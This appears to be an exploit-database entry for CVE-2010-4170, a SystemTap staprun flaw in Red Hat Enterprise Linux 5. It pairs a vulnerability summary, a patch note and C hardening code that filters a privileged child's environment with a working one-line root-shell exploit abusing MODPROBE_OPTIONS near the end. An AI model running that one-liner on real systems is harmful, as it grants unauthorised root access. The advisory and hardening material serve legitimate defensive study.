Vendor: Red Hat Enterprise Linux
By: Red Hat
CVSS: 7.2 (HIGH)
Local Privilege Escalation
CWE: 264
Product Name: Red Hat Enterprise Linux
Affected Version From: Red Hat Enterprise Linux 5
Affected Version To: Red Hat Enterprise Linux 5
Patch Exists: YES
Related CVE: CVE-2010-4170
CPE: o:redhat:enterprise_linux:5
Platforms Tested: Linux
2010

CVE-2010-4170

This exploit allows a local user to gain root privileges on a system running Red Hat Enterprise Linux 5. It is based on a vulnerability in the SystemTap package that allows a local user to execute arbitrary code with root privileges. The exploit works by using printf to write a malicious configuration file, which is then picked up when the staprun command is run: the MODPROBE_OPTIONS environment variable points modprobe at it. The file contains an install directive that runs /bin/sh with root privileges in place of loading the uprobes module.

Mitigation:

Red Hat has released a patch for this vulnerability.
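
The one-liner on this page works because the caller's environment, MODPROBE_OPTIONS included, reaches modprobe through the privileged staprun helper. A general hardening for that class of bug, as an added example that is not code from this page or from the Red Hat patch: build the child's environment from an allow-list. The allow-list contents, the fixed PATH and the names build_clean_env and env_allowed are assumptions of this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Variables a privileged helper may hand to its child (assumed list). */
static const char *const ALLOWED[] = { "LANG", "TERM", NULL };

/* Return 1 if "NAME=value" names an allow-listed variable. */
static int env_allowed(const char *entry)
{
    const char *eq = strchr(entry, '=');
    if (eq == NULL || eq == entry) return 0;
    size_t n = (size_t)(eq - entry);
    for (size_t i = 0; ALLOWED[i] != NULL; i++)
        if (strlen(ALLOWED[i]) == n && strncmp(entry, ALLOWED[i], n) == 0)
            return 1;
    return 0;
}

/* Build the environment for a root child process: a fixed PATH plus the
 * allow-listed entries of envp. MODPROBE_OPTIONS and everything else the
 * caller set is dropped. Free only the returned array; NULL on failure. */
char **build_clean_env(char *const envp[])
{
    static char fixed_path[] = "PATH=/sbin:/usr/sbin:/bin:/usr/bin";
    size_t count = 0, k = 0;
    while (envp != NULL && envp[count] != NULL)
        count++;
    char **out = calloc(count + 2, sizeof *out);
    if (out == NULL) return NULL;
    out[k++] = fixed_path;
    for (size_t i = 0; i < count; i++)
        if (env_allowed(envp[i]))
            out[k++] = envp[i];
    out[k] = NULL;
    return out;
}

int main(void)
{
    /* Constructed caller environment, shaped like the one-liner's. */
    char *caller[] = { "PATH=/tmp", "MODPROBE_OPTIONS=-C exploit.conf", "LANG=C", NULL };
    char **clean = build_clean_env(caller);
    if (clean == NULL) return 1;
    for (size_t i = 0; clean[i] != NULL; i++)
        puts(clean[i]);  /* this array is what execve() should get as envp */
    free(clean);
    return 0;
}
```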
Source

Exploit-DB raw data:

CVE-2010-4170

printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever


RHEL Advisory:
https://rhn.redhat.com/errata/RHSA-2010-0894.html